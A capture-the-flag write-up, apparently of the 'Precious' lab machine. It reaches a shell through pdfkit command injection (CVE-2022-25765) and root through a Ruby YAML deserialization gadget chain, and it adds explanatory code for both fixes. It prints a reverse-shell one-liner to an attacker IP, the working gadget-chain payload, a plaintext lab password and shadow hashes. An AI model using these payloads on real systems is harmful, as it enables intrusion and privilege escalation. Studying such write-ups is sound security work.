Basic information

Port scan

Ports 22 and 80 are open:

$ nmap -sC -sV -Pn 10.10.11.189
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-03 15:24 CST
Nmap scan report for 10.10.11.189
Host is up (0.31s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 845e13a8e31e20661d235550f63047d2 (RSA)
| 256 a2ef7b9665ce4161c467ee4e96c7c892 (ECDSA)
|_ 256 33053dcd7ab798458239e7ae3c91a658 (ED25519)
80/tcp open http nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: Did not follow redirect to http://precious.htb/
2161/tcp filtered apc-agent
8045/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.64 seconds

80

The web server redirects to precious.htb, so add a hosts entry:

10.10.11.189 precious.htb

The page takes a URL as input and converts it to a PDF:

pdfkit

Testing the PDF conversion shows that the generator is pdfkit v0.8.6 (the version string is written into the generated PDF's metadata):

A search turns up the matching vulnerability, CVE-2022-25765: pdfkit up to 0.8.6 hands an attacker-supplied URL to the shell without proper escaping, so a URL can carry a command:

reverse shell

Landing a shell with a Ruby one-liner. The backticks inside the URL are executed by the shell that pdfkit spawns; the Ruby command inside them connects back to 10.10.14.10:4444 and attaches sh to the socket:

http://10.10.14.10:7777/?name=#{'%20`ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("10.10.14.10",4444))'`'}
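To see why the `%20` and the backticks in that URL matter, here is an added example (my own code, not pdfkit's source): it mirrors the shape of the pdfkit <= 0.8.6 bug with `echo` standing in for wkhtmltopdf so it runs offline. The function names `url_needs_escaping?`, `build_command_unsafe`, `build_command_safe` and `run`, and the `echo injected` payload, are this example's own assumptions; the URL is constructed in the same shape as the one used above, with the reverse shell swapped for a harmless `echo`.

```ruby
require 'uri'

# Added example, not pdfkit's code. It reproduces the pattern behind
# CVE-2022-25765: a URL that already contains a %xx sequence is not
# URI-escaped, and the whole command is built as one string that IO.popen
# runs through /bin/sh -c.
PARSER = URI::RFC2396_Parser.new

# A URL is only escaped when it looks unescaped, i.e. when unescaping it
# changes nothing. The "%20" in the payload makes this return false, so the
# backticks are passed through to the shell untouched.
def url_needs_escaping?(url)
  PARSER.unescape(url) == url
end

# Vulnerable pattern: quote by hand, join into one string. Inside double
# quotes the shell still performs command substitution on backticks.
def build_command_unsafe(renderer, url)
  url = PARSER.escape(url) if url_needs_escaping?(url)
  [renderer, '--quiet', %("#{url}"), '-'].join(' ')
end

# Hardened pattern: an argv array. IO.popen(Array) execs the program
# directly, the URL is one argument, and no shell ever parses it.
def build_command_safe(renderer, url)
  [renderer, '--quiet', url, '-']
end

# String -> runs via sh -c; Array -> direct exec. Returns what the program printed.
def run(cmd)
  IO.popen(cmd, &:read)
end

# Constructed payload (assumption) in the shape of the one used on the box,
# with a harmless `echo injected` instead of the Ruby reverse shell.
PAYLOAD = %q|http://10.10.14.10:7777/?name=#{'%20`echo injected`'}|

if __FILE__ == $0
  puts run(build_command_unsafe('echo', PAYLOAD)) # backticks were evaluated: "injected" appears, no backtick survives
  puts run(build_command_safe('echo', PAYLOAD))   # the literal `echo injected` is printed unchanged
end
```

The difference between the two `run` calls is the whole fix: once the renderer is invoked with an argv array (or, if a string is unavoidable, one built with `Shellwords.shelljoin`), the URL can contain any characters it likes and still reaches wkhtmltopdf as data.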

Information gathering

henry's password is found in the bundler config file (~/.bundle/config):

henry:Q3c1AqGHtoI0aXAYFH

user flag

Log in over SSH as henry and read the user flag:

Privilege escalation enumeration

sudo -l shows a Ruby script that henry can run as root; it loads a YAML file. Locating the original YAML file it reads, and checking the YAML library version, confirms that the load is the unsafe kind:

yaml

YAML deserialization:

Privilege escalation & root flag

Craft a malicious yml file and run the Ruby script through sudo to trigger command execution. The gadget chain below ends in Kernel#system, which sets the SUID bit on /usr/bin/bash:

dependencies.yml

---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: chmod +s /usr/bin/bash
         method_id: :resolve
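The root cause of the privilege escalation is that the script loads an attacker-writable YAML file with a loader that instantiates arbitrary Ruby objects. The following is an added example (my own code, not the script from the box) that shows both halves: what an unsafe load does with an object tag, and how a dependencies-file loader that rejects the gadget chain above looks. The class `Probe`, the functions `unsafe_load` and `load_dependencies`, and the sample documents are this example's own assumptions; `GADGET_DOC` is the dependencies.yml from above, included only to show that the safe loader refuses it, and it is never handed to the unsafe loader.

```ruby
require 'yaml'

# Added example, not the box's script. Before Psych 4, YAML.load was the
# unsafe loader: any "!ruby/object:Class" tag allocates that class and sets
# instance variables from the mapping, without calling initialize. That is
# what lets the Gem::* chain above reach Kernel#system.

# Harmless stand-in for the gadget classes (assumption).
class Probe
  attr_reader :marker
  def initialize
    @marker = 'untouched'
  end
end

# Constructed document: sets @marker directly, bypassing initialize.
PROBE_DOC = "--- !ruby/object:Probe\nmarker: set by yaml\n"

# The gadget chain from dependencies.yml above, verbatim. Only ever passed
# to the safe loader here; an unsafe load of it runs `chmod +s /usr/bin/bash`.
GADGET_DOC = <<~'YAML'
  ---
  - !ruby/object:Gem::Installer
      i: x
  - !ruby/object:Gem::SpecFetcher
      i: y
  - !ruby/object:Gem::Requirement
    requirements:
      !ruby/object:Gem::Package::TarReader
      io: &1 !ruby/object:Net::BufferedIO
        io: &1 !ruby/object:Gem::Package::TarReader::Entry
           read: 0
           header: "abc"
        debug_output: &1 !ruby/object:Net::WriteAdapter
           socket: &1 !ruby/object:Gem::RequestSet
               sets: !ruby/object:Net::WriteAdapter
                   socket: !ruby/module 'Kernel'
                   method_id: :system
               git_set: chmod +s /usr/bin/bash
           method_id: :resolve
YAML

# Legacy behaviour: on Psych >= 3.3.2 this is YAML.unsafe_load; on older
# Psych plain YAML.load already behaves this way.
def unsafe_load(doc)
  YAML.respond_to?(:unsafe_load) ? YAML.unsafe_load(doc) : YAML.load(doc)
end

# Hardened loader for a file of name => version pairs: no object tags, no
# symbols, no aliases, and the shape is validated before anything uses it.
# A version like "2.0" (no second dot) would parse as a Float; the check
# rejects it so the caller cannot be tricked with a non-string value.
def load_dependencies(doc)
  data = YAML.safe_load(doc, permitted_classes: [], aliases: false)
  raise ArgumentError, 'expected a mapping of name => version' unless data.is_a?(Hash)
  data.each do |name, version|
    unless name.is_a?(String) && version.is_a?(String)
      raise ArgumentError, "bad entry #{name.inspect} => #{version.inspect}"
    end
  end
  data
end
```

Running the script as root via sudo does not change the analysis: the fix is to use `YAML.safe_load` (the default for `YAML.load` from Psych 4 onward) and, independently, to stop reading a file the low-privilege user can write.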

shadow

root:$y$j9T$a.ggVdbxv0sDezKDImKn91$BB2mMoZ0UwInxNcXuyDALhr4li59AHfVw5DuV0d5Ww1:19284:0:99999:7:::
henry:$y$j9T$Q/v28PgszKjK0KDbSATMs1$7K1zLKHnnClQLLI92aeVT9HQXA6bgaG4BOTgLTGi.gA:19261:0:99999:7:::

References